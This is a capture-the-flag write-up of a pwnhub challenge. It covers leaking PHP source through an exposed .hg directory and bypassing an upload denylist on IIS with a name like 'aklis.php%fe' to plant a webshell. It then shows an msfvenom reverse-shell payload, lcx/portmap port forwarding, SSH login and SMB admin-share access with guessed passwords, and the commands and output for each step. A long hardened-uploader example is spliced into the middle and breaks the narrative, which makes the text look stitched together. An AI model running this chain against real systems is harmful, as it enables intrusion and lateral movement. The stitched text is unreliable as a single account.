What a difficult journey this was.

Looking at the website turned up nothing, and a port scan turned up nothing either.
Then I scanned paths with 猪猪侠's dirfuzz, which found the path file/.hg; with https://github.com/kost/dvcs-ripper I could pull the source code.
Next came a round of code auditing.

The vulnerability is in uploader.php:

```php
<?php
session_start();

// Get the filename and make sure it is valid
$filename = basename($_FILES['file']['name']);

// Get the username and make sure it is valid
$username = $_SESSION['userName'];
if (!preg_match('/^[\w_\-]+$/', $username) ){
    echo "Invalid username";
    header("Refresh: 2; url=files.php");
    exit;
}

if(isset($_POST['submit'])){
    $filename = md5(uniqid(rand()));
    $filename = preg_replace("/[^\w]/i", "", $filename);
    $upfile = $_FILES['file']['name'];
    $upfile = str_replace(';',"",$upfile);
    $tempfile = $_FILES['file']['tmp_name'];
    $ext = trim(get_extension($upfile)); // null
    // denylist on the raw extension bytes; anything else passes through
    if(in_array($ext,array('php','php3','php5','php7','phtml'))){
        die('Warning ! File type error..');
    }
    if($ext == 'asp' or $ext == 'asa' or $ext == 'cer' or $ext == 'cdx' or $ext == 'aspx' or $ext == 'htaccess')
        $ext = 'file';
    // the extension that passed the denylist goes straight into the on-disk path
    $full_path = sprintf("./users_file_system/%s/%s.%s", $username, $filename,$ext);
}

// note: $full_path is only set inside the isset($_POST['submit']) branch above
if (move_uploaded_file($_FILES['file']['tmp_name'], $full_path) ){
    header("Location: files.php");
    exit;
} else {
    header("Location: upload_failure.php");
    exit;
}

function get_extension($file){
    // returns everything after the last dot, lowercased, with no further validation
    return strtolower(substr($file, strrpos($file, '.')+1));
}
?>
```
At first glance it looks fine, but earlier, while casually browsing the site, I had noticed it was a Windows Server + IIS site.

I had run into this upload vulnerability before and written a writeup on it:
http://old.lazysheep.cc/2015/05/19/0x24/

Through fuzzing the upload filter can be bypassed: aklis.php%fe also uploads a php file successfully.
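The root cause in uploader.php above is that the on-disk extension is whatever bytes follow the last dot, checked only against a denylist, so a name like aklis.php%fe is neither rejected nor normalised before it reaches the filesystem. The hardened handler below is an added example, not the challenge's code: it allowlists exact ASCII extensions, cross-checks the file content's MIME type, and never lets the client-supplied name reach the disk. It assumes, as the original does, that $_SESSION['userName'] is set by the site's login and that uploads live under ./users_file_system/<user>/; the allowlist and the users_file_system directory name are assumptions taken from the original code, and the web server must separately be configured not to execute anything in that directory.

```php
<?php
// Added example: hardened replacement for the uploader.php shown above.
// Assumptions: session login sets $_SESSION['userName']; uploads are stored
// under ./users_file_system/<user>/ (as in the original); the web server
// does not map script handlers onto that directory.
session_start();

// Only these exact lowercase ASCII extensions are accepted, each paired with
// the MIME type the file content must report. No denylist anywhere.
const ALLOWED_TYPES = [
    'jpg'  => 'image/jpeg',
    'jpeg' => 'image/jpeg',
    'png'  => 'image/png',
    'gif'  => 'image/gif',
    'pdf'  => 'application/pdf',
];

// pathinfo() instead of strrpos(): a name without a dot yields "" rather than
// the whole name, and strict in_array() means "php\xfe", "php " or "php;"
// can never compare equal to an allowlisted entry.
function allowlisted_extension(string $clientName): ?string {
    $ext = strtolower(pathinfo($clientName, PATHINFO_EXTENSION));
    return array_key_exists($ext, ALLOWED_TYPES) ? $ext : null;
}

// Same character class as the original, but bounded in length.
function safe_username(string $username): ?string {
    return preg_match('/^[A-Za-z0-9_\-]{1,32}$/', $username) === 1 ? $username : null;
}

// Stores one entry of $_FILES and returns the server-generated filename.
function store_upload(array $file, string $username): string {
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload failed');
    }
    $ext = allowlisted_extension((string)$file['name']);
    if ($ext === null) {
        throw new RuntimeException('file type not allowed');
    }
    // Second opinion from the bytes on disk, not from the client's name.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime  = $finfo->file($file['tmp_name']);
    if ($mime !== ALLOWED_TYPES[$ext]) {
        throw new RuntimeException('content does not match extension');
    }
    // The client name is used for nothing else; the stored name is random.
    $storedName = bin2hex(random_bytes(16)) . '.' . $ext;
    $dir = __DIR__ . '/users_file_system/' . $username;
    if (!is_dir($dir) && !mkdir($dir, 0750, true)) {
        throw new RuntimeException('cannot create user directory');
    }
    if (!move_uploaded_file($file['tmp_name'], $dir . '/' . $storedName)) {
        throw new RuntimeException('cannot move uploaded file');
    }
    return $storedName;
}

$username = safe_username((string)($_SESSION['userName'] ?? ''));
if ($username === null) {
    http_response_code(403);
    exit('Invalid username');
}
if (!isset($_POST['submit'], $_FILES['file'])) {
    http_response_code(400);
    exit('No upload submitted');
}
try {
    store_upload($_FILES['file'], $username);
    header('Location: files.php');
} catch (RuntimeException $e) {
    header('Location: upload_failure.php');
}
exit;
```

Note that every failure path, including the case where the form field is missing, ends before move_uploaded_file() is reached, whereas the original only assigns $full_path inside the isset($_POST['submit']) branch.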
After getting a webshell, I used msf to generate a reverse-shell exe (aklis.exe):

```
$ msfvenom -p windows/shell_reverse_tcp LHOST=xxxx LPORT=6666 -f exe -o /tmp/reverse.exe
```
Found an internal IP, 172.31.5.95, and connected to that target over ssh with Xshell; the user is ubuntu.
After that I used lcx.exe from dlive for port forwarding; reference:
http://wps2015.org/drops/drops/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%E4%B8%AD%E8%BD%AC%E5%8F%91%E5%B7%A5%E5%85%B7%E6%80%BB%E7%BB%93.html
Command on Windows:

```
C:\inetpub\wwwroot\file\users_file_system\dlive\> lcx.exe -slave xxx 10000 172.31.5.95 22
```
Command on my xxx box:

```
$ ./portmap -m 2 -p1 10000 -p2 12345
```
portmap is the Linux version of lcx; download: http://www.vuln.cn/2791
Then it was just a matter of connecting over ssh:

```
$ ssh ubuntu@xxx -p12345
password: abc@elk
```
The password was known from the hint:

I found a flag in the root directory and thought I had solved it, then learned it was a fake. Totally crushed......

On this ubuntu server the ubuntu user can sudo and has root, but the box cannot reach the outside, so installing tools is inconvenient...
Then in /home/ubuntu/.bash_history I found yet another internal IP: 172.31.13.133
.bash_history also shows that 172.31.13.133 has three ports open: 135, 139, 445.
Then came a series of searches for related vulnerabilities, forwarding the corresponding ports out and testing with msf, without result....

Then I found the IPC$-related commands.

On the Windows box:

```
C:\inetpub\wwwroot\file\users_file_system\aklis>net use \\172.31.13.133\ipc$ "" /user:""
net use \\172.31.13.133\ipc$ "" /user:""
The command completed successfully.

C:\inetpub\wwwroot\file\users_file_system\aklis>net view \\172.31.13.133
net view \\172.31.13.133
System error 5 has occurred.

Access is denied.
```
But that was no use, so I tried logging in.....

```
C:\inetpub\wwwroot\file\users_file_system\aklis>net use \\172.31.13.133\ipc$ "abc@ELK" /user:"Administrator"
net use \\172.31.13.133\ipc$ "abc@ELK" /user:"Administrator"
The command completed successfully.
```
Login succeeded.....

How was the password obtained?

From the hint:

```
2017.01.15 11:50:00 administrator: Ugh, so annoying, so many passwords to set. I'll be lazy. Damn it, why does Windows have a password policy too.
```
Then I looked up the Windows password policy:

- At least 6 characters long
- Contains three of the following four kinds of characters:
  - English uppercase letters (A to Z)
  - English lowercase letters (a to z)
  - Base-10 digits (0 to 9)
  - Non-alphabetic characters (for example: !, $, #, %)
- Complexity requirements are enforced when a password is created or changed
Then I guessed it straight away.....

Next:

```
C:\inetpub\wwwroot\file\users_file_system\aklis>net use d: \\172.31.13.133\c$ "abc@ELK" /user:"Administrator"
net use d: \\172.31.13.133\c$ "abc@ELK" /user:"Administrator"
The command completed successfully.
```
Then I went into D: and looked for the flag, but did not find it. I then learned the flag was on this machine, so I looked up Windows file-search commands:

```
D:\>for /r D: %i in (*flag*) do @echo %i
for /r D: %i in (*flag*) do @echo %i
D:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\flag.txt
D:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\flag.lnk
```
OK.... found the flag:

```
D:\>cd "Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5"
cd "Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5"

D:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5>dir
dir
 Volume in drive D has no label.
 Volume Serial Number is B2D4-D0F2

 Directory of D:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5

12/12/2016  02:26    <DIR>          .
12/12/2016  02:26    <DIR>          ..
12/01/2017  08:35                31 flag.txt
10/06/2009  21:14             7,169 Workflow.Targets
10/06/2009  21:14             8,680 Workflow.VisualBasic.Targets
               3 File(s)         15,880 bytes
               2 Dir(s)   2,673,094,656 bytes free

D:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5>type flag.txt
type flag.txt
pwnhub{flag:y0u f0und my h3art}
```